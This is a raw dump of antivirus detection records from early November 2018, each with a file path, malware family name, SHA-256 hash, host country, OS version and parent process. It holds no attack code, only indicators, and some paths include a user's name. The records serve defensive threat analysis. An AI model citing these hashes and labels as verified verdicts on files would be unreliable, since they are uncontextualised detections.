  Row(detection=Row(filename='deletedoctor.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DeleteDoctor.exe', filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='opencv_haartraining.exe', filepath='E:\\Programs\\Developer Pro\\OpenCV\\opencv\\build\\x64\\vc11\\bin\\opencv_haartraining.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='4995d3ea19a3182b0a8eb26e6ad01e19f3aad925c41ff6fc2d77cec4ceaa3886', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESET\\ESET Security\\ekrn.exe', parentsize=2260144, timestamp='2018-11-04T07:21:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='graph.exe', filepath='C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.EXE', filesize=4336000, name='W32/Jeefo.A.#M1.#R1'), hash='457eb99755520770d7079a8ee4a46c4b35a26718179f1b74f2e33736fa8c441b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:265HsU8B6EKUn9k0.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-04T21:50:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kms10.exe', filepath='c:\\windows\\kms10\\kms10.exe', filesize=2176000, name='SPR/HackKMS.d5c565.#M1.#R1'), hash='d5c56597bf7381a46cd51bc26ff6a004945bc08a2760197ae45b98d904d14268', metadata=Row(cmdline='auto', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T01:15:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-053038-50bfdee3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1032cb7a\\AVSCAN-20181104-052217-0AE98767\\AVSCAN-20181104-053038-50BFDEE3', filesize=704000, name='TR/ExtenBro.uhnh.#M1.#R1'), hash='b81896f94673175360a9e4fc6ff65816141781016e6c83b9dfe3cbbd77e10901', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T05:30:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200605-1026ebbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-200605-1026EBBC', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:06:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215118-81cca21c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215118-81CCA21C', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:51:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3628141\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Roaming\\The SIMS 4\\sims4seasons_0039105070.exe', parentsize=2454672, timestamp='2018-11-04T20:07:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:09:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-221605-6484f44d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221605-6484F44D', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ue32.exe', filepath='\\\\?\\D:\\Anti Virus\\all norton virsion\\Norton AntiVirus 2003 Pro (final)\\AdvTools\\UE32.EXE', filesize=512000, name='W32/Sality.Patched.#M1.#R1'), hash='e96842aadbfbb3743367849ec9d5762a6e3632526b64c98aa5c9e218f9d02d2b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:45:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{07D3CB25-7F85-41AB-823A-1A37E2FE5C1D}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='a56c31d4c25d9f8878b1a7162f9fd1f252eb7c75f326c8f3a1f749970dcfa811', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:48:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='utilman.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\utilman.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='bf4ebfc2b7418095fa9eb5e11cfc20ce39a05c8ba201d79507c8af9540f23102', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:12:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='c58874f818da4d0df60a86d6cac3d3b2b1d5230a5b6495a3f7c6a76c25a2361c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:37:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autokms.exe', filepath='C:\\Windows\\AutoKMS\\AutoKMS.exe', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=103696, timestamp='2018-11-02T08:10:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202919-df7723f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5d9b26c4\\AVSCAN-20181102-202904-DDE4BD09\\AVSCAN-20181102-202919-DF7723F5', filesize=1864000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='b6dc54250e9a6696d3945fbf96b38aeeb4b5bd37ab37a88200efa3bb8e88205a', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T23:30:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae8e4b96b5522890593bbb379a0a66f0e8e5005d2f7fb40e900a20a0fba7d81a', metadata=Row(cmdline='\\\\\\/Embedding', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T07:25:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:51:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7a3efd2057a06be4464a8d246d73703236398a3ed616a213dee7b5ff3c271122', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\7A3EFD2057A06BE4464A8D246D73703236398A3ED616A213DEE7B5FF3C271122', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7a3efd2057a06be4464a8d246d73703236398a3ed616a213dee7b5ff3c271122', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:19:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175447-dde1c852', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6cc3e2a4\\AVSCAN-20181102-174957-BA826308\\AVSCAN-20181102-175447-DDE1C852', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='d07d13f6ada258f7cd7cc415aa56e2f7e73f1d2688a1274a217b241f004fd37e', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:51:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145238-40e895ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b42d94e4\\AVSCAN-20181102-145135-3ABB3175\\AVSCAN-20181102-145238-40E895EE', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FileZilla_3.29.0_win64-setup_bundled.exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ruooyknk.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\RuooYkNK.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102851-795fa873', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_26d8c8c1\\AVSCAN-20181102-102759-706FF287\\AVSCAN-20181102-102851-795FA873', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:28:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082214-70a165ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082136-6BD8F9E6\\AVSCAN-20181102-082214-70A165CE', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111840-74faba1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-111840-74FABA1B', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='cae108464dd278b34f958dbb74ffefe382ef99e74b048bb4ae1be95671688a2f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:20:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='12x18.exe', filepath='F:\\output\\12x18\\12x18.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline='--engine=2 --session-id=q60JLb5hBxZR4YHLCx98utP9vrub06RsYzipG4VQ --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=13449336, timestamp='2018-11-02T13:07:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sound.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\menusystem\\SOUND\\SOUND.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e6b238c3e2ac7f1e06dc58099cb5ac6c6f7a1b9d1dfbd82b394c35b5153a17ba', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-071917-9d2a63ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-071917-9D2A63CA', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mspfilt.dll', filepath='C:\\Program Files\\Common Files\\Microsoft Shared\\MODI\\11.0\\MSPFILT.DLL', filesize=900000, name='W32/Ramnit.C.#M1.#R1'), hash='f085f0421be8a318ac3e90a113396e7c8feac3a154aa0e3b0c6d52369b7f8054', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:56:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110803-c7aa087d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110803-C7AA087D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082835-10a00544', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-082835-10A00544', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup1.exe', filepath='\\\\?\\C:\\bkp\\Users\\isabela soares\\AppData\\Local\\Temp\\Setup1.exe', filesize=76000, name='TR/Dldr.CoinMiner.F.#M1.#R1'), hash='d967683cd1ab2654a0164d8df6eb6e5d953f3d6e97ee60a8bd37ec841c53f1cc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:24:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221533-5fc1df60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221533-5FC1DF60', filesize=64000, name='TR/Siggen.64000.7.#M1.#R1'), hash='c030b37c4066998c7686b51d6cd8690308eeeadbec7712a6ae6190b18fd40916', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='beforeghost.exe', filepath='E:\\HBCD\\Programs\\BeforeGhost.exe', filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\29d4af865fc1c2f21c02365364e4bd9d\\synctask.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='e4b6c38e78ff4fc0d5fbe2998c3558522f1186a370f41cc0a1dd516bb4c88c0b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:56:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_1114c76a.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_1114c76a.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:05:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120311-a47c6797', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_440c5016\\AVSCAN-20181102-115656-72600A74\\AVSCAN-20181102-120311-A47C6797', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:03:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-090426-b5ef150f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-090426-B5EF150F', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:03:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rtmpdump.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DsNET Corp\\aTube Catcher 2.0\\rtmpdump.exe', filesize=384000, name='W32/Neshta.A.#M1.#R1'), hash='afee537dda8689f04666b5ce7f6d00d0ccabddd0649b782d4a91726e519bd02e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002937a9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002937a9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:30:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e044', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e044', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:55:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl136.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl136.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e82d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e82d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:02:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cf61', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cf61', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:43:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203134-b30a2daa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_690ab3e1\\AVSCAN-20181104-201541-5A869D8C\\AVSCAN-20181104-203134-B30A2DAA', filesize=64000, name='TR/Spy.64000.63.#M1.#R1'), hash='ffc50b193a6366a5f551fa5365535af36ea20167a5dd6da842da49cf6b0a76e4', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:31:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e69d066f2cd3336846a2fb31e3ad342c0c4e1960ede10407e064706a3d545c05', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E69D066F2CD3336846A2FB31E3AD342C0C4E1960EDE10407E064706A3D545C05', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e69d066f2cd3336846a2fb31e3ad342c0c4e1960ede10407e064706a3d545c05', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:59:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rise of the tomb raider - installshield wizard.exe', filepath='C:\\Users\\X\\Downloads\\Rise of the Tomb Raider - InstallShield Wizard.exe', filesize=15232000, name='HEUR/AGEN.1008572.#M1.#R1'), hash='b2c3f852e43ff4ddc1cf2eb945f06c846acb6fcf0adb9b44f8125635c7397dc3', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:29:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133859-e3e42ccc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133859-E3E42CCC', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:39:02Z'), dt=datetime.date(2018, 11, 4)),
